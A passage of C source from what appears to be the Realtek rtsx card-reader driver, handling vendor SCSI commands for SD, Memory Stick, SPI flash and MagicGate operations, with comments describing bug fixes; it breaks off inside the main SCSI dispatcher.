	u8 rtsx_status[16];
	int buf_len;
	unsigned int lun = SCSI_LUN(srb);

	rtsx_status[0] = (u8)(chip->vendor_id >> 8);
	rtsx_status[1] = (u8)(chip->vendor_id);

	rtsx_status[2] = (u8)(chip->product_id >> 8);
	rtsx_status[3] = (u8)(chip->product_id);

	rtsx_status[4] = (u8)lun;

	/* Byte 5: card type code for this LUN */
	if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
		if (chip->lun2card[lun] == SD_CARD) {
			rtsx_status[5] = 2;
		} else {
			rtsx_status[5] = 3;
		}
	} else {
		if (chip->card_exist) {
			if (chip->card_exist & XD_CARD) {
				rtsx_status[5] = 4;
			} else if (chip->card_exist & SD_CARD) {
				rtsx_status[5] = 2;
			} else if (chip->card_exist & MS_CARD) {
				rtsx_status[5] = 3;
			} else {
				rtsx_status[5] = 7;
			}
		} else {
			rtsx_status[5] = 7;
		}
	}

	/* Byte 6: number of LUNs exposed */
	if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
		rtsx_status[6] = 2;
	} else {
		rtsx_status[6] = 1;
	}

	rtsx_status[7] = (u8)(chip->product_id);
	rtsx_status[8] = chip->ic_version;

	if (check_card_exist(chip, lun)) {
		rtsx_status[9] = 1;
	} else {
		rtsx_status[9] = 0;
	}

	/* Byte 10: 1 = single-LUN configuration */
	if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
		rtsx_status[10] = 0;
	} else {
		rtsx_status[10] = 1;
	}

	/* Byte 11: which card types this LUN can hold */
	if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
		if (chip->lun2card[lun] == SD_CARD) {
			rtsx_status[11] = SD_CARD;
		} else {
			rtsx_status[11] = MS_CARD;
		}
	} else {
		rtsx_status[11] = XD_CARD | SD_CARD | MS_CARD;
	}

	if (check_card_ready(chip, lun)) {
		rtsx_status[12] = 1;
	} else {
		rtsx_status[12] = 0;
	}

	/* Byte 13: per-card-type capability bits */
	if (get_lun_card(chip, lun) == XD_CARD) {
		rtsx_status[13] = 0x40;
	} else if (get_lun_card(chip, lun) == SD_CARD) {
		struct sd_info *sd_card = &(chip->sd_card);

		rtsx_status[13] = 0x20;
		if (CHK_SD(sd_card)) {
			if (CHK_SD_HCXC(sd_card))
				rtsx_status[13] |= 0x04;
			if (CHK_SD_HS(sd_card))
				rtsx_status[13] |= 0x02;
		} else {
			/* MMC */
			rtsx_status[13] |= 0x08;
			if (CHK_MMC_52M(sd_card))
				rtsx_status[13] |= 0x02;
			if (CHK_MMC_SECTOR_MODE(sd_card))
				rtsx_status[13] |= 0x04;
		}
	} else if (get_lun_card(chip, lun) == MS_CARD) {
		struct ms_info *ms_card = &(chip->ms_card);

		if (CHK_MSPRO(ms_card)) {
			rtsx_status[13] = 0x38;
			if (CHK_HG8BIT(ms_card))
				rtsx_status[13] |= 0x04;
#ifdef SUPPORT_MSXC
			if (CHK_MSXC(ms_card))
				rtsx_status[13] |= 0x01;
#endif
		} else {
			rtsx_status[13] = 0x30;
		}
	} else {
		/* No card: encode LUN mode / SDIO presence instead */
		if (CHECK_LUN_MODE(chip, DEFAULT_SINGLE)) {
#ifdef SUPPORT_SDIO
			if (chip->sd_io && chip->sd_int) {
				rtsx_status[13] = 0x60;
			} else {
				rtsx_status[13] = 0x70;
			}
#else
			rtsx_status[13] = 0x70;
#endif
		} else {
			if (chip->lun2card[lun] == SD_CARD) {
				rtsx_status[13] = 0x20;
			} else {
				rtsx_status[13] = 0x30;
			}
		}
	}

	rtsx_status[14] = 0x78;
	/* Byte 15: bit 0 set when an SDIO function is present */
	if (CHK_SDIO_EXIST(chip) && !CHK_SDIO_IGNORED(chip)) {
		rtsx_status[15] = 0x83;
	} else {
		rtsx_status[15] = 0x82;
	}

	buf_len = min(scsi_bufflen(srb), (unsigned int)sizeof(rtsx_status));
	rtsx_stor_set_xfer_buf(rtsx_status, buf_len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - buf_len);

	return TRANSPORT_GOOD;
}
/*
 * GET_BUS_WIDTH vendor command: return the cached bus width for the
 * SD/MS card in this LUN as a single byte.  Fails when no card is
 * ready, or when the card is neither SD nor MS.
 */
static int get_card_bus_width(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);
	u8 card, bus_width;

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	card = get_lun_card(chip, lun);
	if ((card == SD_CARD) || (card == MS_CARD)) {
		bus_width = chip->card_bus_width[lun];
	} else {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	scsi_set_resid(srb, 0);
	rtsx_stor_set_xfer_buf(&bus_width, scsi_bufflen(srb), srb);

	return TRANSPORT_GOOD;
}
/*
 * SPI_VENDOR_COMMAND dispatcher: temporarily reconfigure the card GPIO
 * direction, run one SPI flash sub-command (cmnd[2]), then restore the
 * GPIO direction.  Only supported on the RTS5208/RTS5288.
 *
 * Fix: the unsupported-chip guard was
 *     if (CHECK_PID(chip, 0x5208) && CHECK_PID(chip, 0x5288))
 * which can never be true when CHECK_PID tests the product id for
 * equality (one chip cannot be both), so unsupported chips were never
 * rejected.  Applied De Morgan to match the intent ("neither 5208 nor
 * 5288"), consistent with set_chip_mode()'s !CHECK_PID(chip, 0x5208)
 * guard.
 */
static int spi_vendor_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int result;
	unsigned int lun = SCSI_LUN(srb);
	u8 gpio_dir;

	/* Reject chips that do not support the SPI vendor interface */
	if (!CHECK_PID(chip, 0x5208) && !CHECK_PID(chip, 0x5288)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	rtsx_force_power_on(chip, SSC_PDCTL);

	/* Save the GPIO direction and route the pins for SPI access */
	rtsx_read_register(chip, CARD_GPIO_DIR, &gpio_dir);
	rtsx_write_register(chip, CARD_GPIO_DIR, 0x07, gpio_dir & 0x06);

	switch (srb->cmnd[2]) {
	case SCSI_SPI_GETSTATUS:
		result = spi_get_status(srb, chip);
		break;

	case SCSI_SPI_SETPARAMETER:
		result = spi_set_parameter(srb, chip);
		break;

	case SCSI_SPI_READFALSHID:
		result = spi_read_flash_id(srb, chip);
		break;

	case SCSI_SPI_READFLASH:
		result = spi_read_flash(srb, chip);
		break;

	case SCSI_SPI_WRITEFLASH:
		result = spi_write_flash(srb, chip);
		break;

	case SCSI_SPI_WRITEFLASHSTATUS:
		result = spi_write_flash_status(srb, chip);
		break;

	case SCSI_SPI_ERASEFLASH:
		result = spi_erase_flash(srb, chip);
		break;

	default:
		/* Restore the GPIO direction before bailing out */
		rtsx_write_register(chip, CARD_GPIO_DIR, 0x07, gpio_dir);

		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	rtsx_write_register(chip, CARD_GPIO_DIR, 0x07, gpio_dir);

	if (result != STATUS_SUCCESS) {
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return TRANSPORT_GOOD;
}
/*
 * Top-level vendor-specific command dispatcher: route the opcode in
 * cmnd[1] to the matching handler.  Unknown opcodes fail with
 * "invalid field in CDB".
 */
static int vendor_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int result;

	switch (srb->cmnd[1]) {
	case READ_STATUS:
		result = read_status(srb, chip);
		break;

	case READ_MEM:
		result = read_mem(srb, chip);
		break;

	case WRITE_MEM:
		result = write_mem(srb, chip);
		break;

	case READ_EEPROM:
		result = read_eeprom(srb, chip);
		break;

	case WRITE_EEPROM:
		result = write_eeprom(srb, chip);
		break;

	case TOGGLE_GPIO:
		result = toggle_gpio_cmd(srb, chip);
		break;

	case GET_SD_CSD:
		result = get_sd_csd(srb, chip);
		break;

	case GET_BUS_WIDTH:
		result = get_card_bus_width(srb, chip);
		break;

#ifdef _MSG_TRACE
	case TRACE_MSG:
		result = trace_msg_cmd(srb, chip);
		break;
#endif

	case SCSI_APP_CMD:
		result = app_cmd(srb, chip);
		break;

	case SPI_VENDOR_COMMAND:
		result = spi_vendor_cmd(srb, chip);
		break;

	default:
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return result;
}
#if !defined(LED_AUTO_BLINK) && !defined(REGULAR_BLINK)
/*
 * Software LED blink: accumulate the sector count of READ/WRITE traffic
 * per LUN and toggle the LED GPIO once the total reaches
 * GPIO_TOGGLE_THRESHOLD.  Only compiled when no hardware/timer-driven
 * blink mode is enabled.  Non-R/W commands are ignored.
 */
void led_shine(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);
	u16 sec_cnt;

	/* Extract the transfer length from the CDB (10- or 6-byte form) */
	if ((srb->cmnd[0] == READ_10) || (srb->cmnd[0] == WRITE_10)) {
		sec_cnt = ((u16)(srb->cmnd[7]) << 8) | srb->cmnd[8];
	} else if ((srb->cmnd[0] == READ_6) || (srb->cmnd[0] == WRITE_6)) {
		sec_cnt = srb->cmnd[4];
	} else {
		return;
	}

	if (chip->rw_cap[lun] >= GPIO_TOGGLE_THRESHOLD) {
		toggle_gpio(chip, LED_GPIO);
		chip->rw_cap[lun] = 0;
	} else {
		chip->rw_cap[lun] += sec_cnt;
	}
}
#endif
/*
 * MemoryStick format vendor command: format the MS Pro card in this
 * LUN.  The CDB must carry the ASCII signature "MGfmt" in bytes 3..7;
 * bit 0 of cmnd[8] selects a full format (set) or quick format (clear).
 * Fails for non-MS LUNs, absent/write-protected cards, and non-Pro
 * sticks.
 */
static int ms_format_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	struct ms_info *ms_card = &(chip->ms_card);
	unsigned int lun = SCSI_LUN(srb);
	int retval, quick_format;

	if (get_lun_card(chip, lun) != MS_CARD) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* Bytes 3..7 must spell "MGfmt" */
	if ((srb->cmnd[3] != 0x4D) || (srb->cmnd[4] != 0x47) ||
			(srb->cmnd[5] != 0x66) || (srb->cmnd[6] != 0x6D) ||
			(srb->cmnd[7] != 0x74)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);

		/* Re-probe: the card may have gone away during suspend */
		if (!check_card_ready(chip, lun) ||
				(get_card_size(chip, lun) == 0)) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	if (srb->cmnd[8] & 0x01) {
		quick_format = 0;
	} else {
		quick_format = 1;
	}

	if (!(chip->card_ready & MS_CARD)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	if (chip->card_wp & MS_CARD) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_PROTECT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* Only MS Pro cards support the format command */
	if (!CHK_MSPRO(ms_card)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	retval = mspro_format(srb, chip, MS_SHORT_DATA_LEN, quick_format);
	if (retval != STATUS_SUCCESS) {
		set_sense_type(chip, lun, SENSE_TYPE_FORMAT_CMD_FAILED);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	scsi_set_resid(srb, 0);
	return TRANSPORT_GOOD;
}
#ifdef SUPPORT_PCGL_1P18
/*
 * get_ms_information - handle the vendor GET MEMORY STICK INFORMATION
 * command (PCGL 1.18).
 *
 * Builds a media-information response (system information or model name,
 * selected by the device-information ID in CDB byte 3) and copies it to
 * the SCSI transfer buffer.  Returns STATUS_SUCCESS, or a TRANSPORT_*
 * failure via TRACE_RET with sense data set.
 */
static int get_ms_information(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	struct ms_info *ms_card = &(chip->ms_card);
	unsigned int lun = SCSI_LUN(srb);
	u8 dev_info_id, data_len;
	u8 *buf;
	unsigned int buf_len;
	int i;

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	if (get_lun_card(chip, lun) != MS_CARD) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* CDB bytes 4..7 must spell the ASCII signature "MSID". */
	if ((srb->cmnd[2] != 0xB0) || (srb->cmnd[4] != 0x4D) ||
		(srb->cmnd[5] != 0x53) || (srb->cmnd[6] != 0x49) ||
		(srb->cmnd[7] != 0x44)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	dev_info_id = srb->cmnd[3];
	/* ID 0x10 is invalid on MS XC media, 0x13 invalid on non-XC media,
	 * and the command only applies to MS Pro cards at all. */
	if ((CHK_MSXC(ms_card) && (dev_info_id == 0x10)) ||
		(!CHK_MSXC(ms_card) && (dev_info_id == 0x13)) ||
		!CHK_MSPRO(ms_card)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	if (dev_info_id == 0x15) {
		buf_len = data_len = 0x3A;
	} else {
		buf_len = data_len = 0x6A;
	}

	/*
	 * The response assembled below is data_len + 2 bytes long (the two
	 * length bytes are not counted in data_len): 12 bytes of header/body
	 * prefix plus a 48- or 96-byte payload.  The original code allocated
	 * only buf_len bytes, so the trailing memcpy overran the heap buffer
	 * by two bytes.  Allocate the two extra bytes; the transfer length
	 * passed to rtsx_stor_set_xfer_buf() below is unchanged.
	 */
	buf = kmalloc(buf_len + 2, GFP_KERNEL);
	if (!buf) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	i = 0;
	/* GET Memory Stick Media Information Response Header */
	buf[i++] = 0x00;		/* Data length MSB */
	buf[i++] = data_len;		/* Data length LSB */
	/* Device Information Type Code */
	if (CHK_MSXC(ms_card)) {
		buf[i++] = 0x03;
	} else {
		buf[i++] = 0x02;
	}
	/* SGM bit */
	buf[i++] = 0x01;
	/* Reserved */
	buf[i++] = 0x00;
	buf[i++] = 0x00;
	buf[i++] = 0x00;
	/* Number of Device Information */
	buf[i++] = 0x01;

	/* Device Information Body */
	/* Device Information ID Number */
	buf[i++] = dev_info_id;
	/* Device Information Length */
	if (dev_info_id == 0x15) {
		data_len = 0x31;
	} else {
		data_len = 0x61;
	}
	buf[i++] = 0x00;		/* Data length MSB */
	buf[i++] = data_len;		/* Data length LSB */
	/* Valid Bit */
	buf[i++] = 0x80;

	if ((dev_info_id == 0x10) || (dev_info_id == 0x13)) {
		/* System Information */
		memcpy(buf + i, ms_card->raw_sys_info, 96);
	} else {
		/* Model Name */
		memcpy(buf + i, ms_card->raw_model_name, 48);
	}

	rtsx_stor_set_xfer_buf(buf, buf_len, srb);

	if (dev_info_id == 0x15) {
		scsi_set_resid(srb, scsi_bufflen(srb) - 0x3C);
	} else {
		scsi_set_resid(srb, scsi_bufflen(srb) - 0x6C);
	}

	kfree(buf);
	return STATUS_SUCCESS;
}
#endif
/*
 * ms_sp_cmnd - dispatch the Memory Stick vendor sub-commands.
 *
 * CDB byte 2 selects the sub-command; unknown values fall through and
 * keep the TRANSPORT_ERROR default.
 */
static int ms_sp_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int retval = TRANSPORT_ERROR;

	switch (srb->cmnd[2]) {
	case MS_FORMAT:
		retval = ms_format_cmnd(srb, chip);
		break;
#ifdef SUPPORT_PCGL_1P18
	case GET_MS_INFORMATION:
		retval = get_ms_information(srb, chip);
		break;
#endif
	default:
		break;
	}

	return retval;
}
#ifdef SUPPORT_CPRM
/*
 * sd_extention_cmnd - dispatch the vendor CPRM SD pass-through commands.
 *
 * Wakes the chip, flushes pending SD work, verifies that an SD card is
 * present in the addressed LUN and forwards the request to the matching
 * sd_* helper.  ("extention" is a historical typo; the name is kept
 * because callers reference it.)
 */
static int sd_extention_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);
	int result;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && rtsx_get_stat(chip) == RTSX_STAT_SS) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	sd_cleanup_work(chip);

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	if (get_lun_card(chip, lun) != SD_CARD) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* Same dispatch as before, written as an if-chain on the opcode. */
	if (srb->cmnd[0] == SD_PASS_THRU_MODE) {
		result = sd_pass_thru_mode(srb, chip);
	} else if (srb->cmnd[0] == SD_EXECUTE_NO_DATA) {
		result = sd_execute_no_data(srb, chip);
	} else if (srb->cmnd[0] == SD_EXECUTE_READ) {
		result = sd_execute_read_data(srb, chip);
	} else if (srb->cmnd[0] == SD_EXECUTE_WRITE) {
		result = sd_execute_write_data(srb, chip);
	} else if (srb->cmnd[0] == SD_GET_RSP) {
		result = sd_get_cmd_rsp(srb, chip);
	} else if (srb->cmnd[0] == SD_HW_RST) {
		result = sd_hw_rst(srb, chip);
	} else {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return result;
}
#endif
#ifdef SUPPORT_MAGIC_GATE
/*
 * mg_report_key - handle the MagicGate REPORT KEY command for MS Pro media.
 *
 * Validates the CDB (byte 7 must select the MagicGate-for-Pro key class)
 * and dispatches on the key-format field (byte 10, low 6 bits) to the
 * matching step of the MagicGate key exchange.  Each case also validates
 * the expected transfer length encoded in CDB bytes 8/9 before calling
 * the mg_* helper.  Returns TRANSPORT_GOOD on success, TRANSPORT_FAILED
 * (via TRACE_RET, with sense data set) otherwise.
 */
static int mg_report_key(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	struct ms_info *ms_card = &(chip->ms_card);
	unsigned int lun = SCSI_LUN(srb);
	int retval;
	u8 key_format;

	RTSX_DEBUGP("--%s--\n", __func__);

	/* Leave power-saving states before touching the card. */
	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	ms_cleanup_work(chip);

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	if ((get_lun_card(chip, lun) != MS_CARD)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* Byte 7 carries the key class; only MagicGate-for-Pro is handled. */
	if (srb->cmnd[7] != KC_MG_R_PRO) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	/* MagicGate is only supported on MS Pro media. */
	if (!CHK_MSPRO(ms_card)) {
		set_sense_type(chip, lun, SENSE_TYPE_MG_INCOMPATIBLE_MEDIUM);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	key_format = srb->cmnd[10] & 0x3F;
	RTSX_DEBUGP("key_format = 0x%x\n", key_format);

	switch (key_format) {
	case KF_GET_LOC_EKB:
		/* Local Enabling Key Block: 0x41C-byte transfer expected. */
		if ((scsi_bufflen(srb) == 0x41C) &&
			(srb->cmnd[8] == 0x04) &&
			(srb->cmnd[9] == 0x1C)) {
			retval = mg_get_local_EKB(srb, chip);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		break;

	case KF_RSP_CHG:
		/* Challenge response: 0x24-byte transfer expected. */
		if ((scsi_bufflen(srb) == 0x24) &&
			(srb->cmnd[8] == 0x00) &&
			(srb->cmnd[9] == 0x24)) {
			retval = mg_get_rsp_chg(srb, chip);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		break;

	case KF_GET_ICV:
		/* Integrity Check Value read; CDB byte 5 selects the entry
		 * (must be < 32), bytes 2..4 must be zero. */
		ms_card->mg_entry_num = srb->cmnd[5];
		if ((scsi_bufflen(srb) == 0x404) &&
			(srb->cmnd[8] == 0x04) &&
			(srb->cmnd[9] == 0x04) &&
			(srb->cmnd[2] == 0x00) &&
			(srb->cmnd[3] == 0x00) &&
			(srb->cmnd[4] == 0x00) &&
			(srb->cmnd[5] < 32)) {
			retval = mg_get_ICV(srb, chip);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		break;

	default:
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	scsi_set_resid(srb, 0);
	return TRANSPORT_GOOD;
}
/*
 * mg_send_key - handle the MagicGate SEND KEY command for MS Pro media.
 *
 * Mirror image of mg_report_key() for the host-to-card direction: after
 * the same readiness/CDB validation (plus a write-protect check, since
 * SEND KEY modifies card state), it dispatches on the key-format field
 * (CDB byte 10, low 6 bits) to the matching mg_* helper.  Returns
 * TRANSPORT_GOOD on success, TRANSPORT_FAILED (via TRACE_RET, with sense
 * data set) otherwise.
 */
static int mg_send_key(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	struct ms_info *ms_card = &(chip->ms_card);
	unsigned int lun = SCSI_LUN(srb);
	int retval;
	u8 key_format;

	RTSX_DEBUGP("--%s--\n", __func__);

	/* Leave power-saving states before touching the card. */
	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	ms_cleanup_work(chip);

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	/* SEND KEY writes to the card, so a protected card is rejected. */
	if (check_card_wp(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_PROTECT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	if ((get_lun_card(chip, lun) != MS_CARD)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* Byte 7 carries the key class; only MagicGate-for-Pro is handled. */
	if (srb->cmnd[7] != KC_MG_R_PRO) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	if (!CHK_MSPRO(ms_card)) {
		set_sense_type(chip, lun, SENSE_TYPE_MG_INCOMPATIBLE_MEDIUM);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	key_format = srb->cmnd[10] & 0x3F;
	RTSX_DEBUGP("key_format = 0x%x\n", key_format);

	switch (key_format) {
	case KF_SET_LEAF_ID:
		/* Leaf ID assignment: 0x0C-byte transfer expected. */
		if ((scsi_bufflen(srb) == 0x0C) &&
			(srb->cmnd[8] == 0x00) &&
			(srb->cmnd[9] == 0x0C)) {
			retval = mg_set_leaf_id(srb, chip);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		break;

	case KF_CHG_HOST:
		/* Host challenge: 0x0C-byte transfer expected. */
		if ((scsi_bufflen(srb) == 0x0C) &&
			(srb->cmnd[8] == 0x00) &&
			(srb->cmnd[9] == 0x0C)) {
			retval = mg_chg(srb, chip);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		break;

	case KF_RSP_HOST:
		/* Host response: 0x0C-byte transfer expected. */
		if ((scsi_bufflen(srb) == 0x0C) &&
			(srb->cmnd[8] == 0x00) &&
			(srb->cmnd[9] == 0x0C)) {
			retval = mg_rsp(srb, chip);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		break;

	case KF_SET_ICV:
		/* Integrity Check Value write; CDB byte 5 selects the entry
		 * (must be < 32), bytes 2..4 must be zero. */
		ms_card->mg_entry_num = srb->cmnd[5];
		if ((scsi_bufflen(srb) == 0x404) &&
			(srb->cmnd[8] == 0x04) &&
			(srb->cmnd[9] == 0x04) &&
			(srb->cmnd[2] == 0x00) &&
			(srb->cmnd[3] == 0x00) &&
			(srb->cmnd[4] == 0x00) &&
			(srb->cmnd[5] < 32)) {
			retval = mg_set_ICV(srb, chip);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		break;

	default:
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	scsi_set_resid(srb, 0);
	return TRANSPORT_GOOD;
}
#endif
/*
 * rtsx_scsi_handler - top-level SCSI command dispatcher for the driver.
 *
 * Applies two global gates before dispatching on the opcode:
 *  - while an SD erase is pending (SUPPORT_SD_LOCK), everything except
 *    REQUEST SENSE and the vendor "get device status" query is rejected
 *    with "Logical Unit Not Ready, Format in Progress" sense data;
 *  - while a Memory Stick format is running, only REQUEST SENSE and
 *    INQUIRY are allowed, with the format progress reported in the sense
 *    data.
 * Returns a TRANSPORT_* result from the selected command handler.
 */
int rtsx_scsi_handler(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
#ifdef SUPPORT_SD_LOCK
	struct sd_info *sd_card = &(chip->sd_card);
#endif
	struct ms_info *ms_card = &(chip->ms_card);
	unsigned int lun = SCSI_LUN(srb);
	int result;

#ifdef SUPPORT_SD_LOCK
	if (sd_card->sd_erase_status) {
		/* Block all SCSI command except for
		 * REQUEST_SENSE and rs_ppstatus
		 */
		if (!((srb->cmnd[0] == VENDOR_CMND) &&
				(srb->cmnd[1] == SCSI_APP_CMD) &&
				(srb->cmnd[2] == GET_DEV_STATUS)) &&
				(srb->cmnd[0] != REQUEST_SENSE)) {
			/* Logical Unit Not Ready Format in Progress */
			set_sense_data(chip, lun, CUR_ERR,
					0x02, 0, 0x04, 0x04, 0, 0);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}
#endif

	if ((get_lun_card(chip, lun) == MS_CARD) &&
			(ms_card->format_status == FORMAT_IN_PROGRESS)) {
		if ((srb->cmnd[0] != REQUEST_SENSE) && (srb->cmnd[0] != INQUIRY)) {
			/* Logical Unit Not Ready Format in Progress;
			 * the last sense field carries the percent done. */
			set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x04, 0x04,
					0, (u16)(ms_card->progress));
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	switch (srb->cmnd[0]) {
	case READ_10:
	case WRITE_10:
	case READ_6:
	case WRITE_6:
		result = read_write(srb, chip);
#if !defined(LED_AUTO_BLINK) && !defined(REGULAR_BLINK)
		/* Manual LED blinking when no hardware/timer blink is used. */
		led_shine(srb, chip);
#endif
		break;

	case TEST_UNIT_READY:
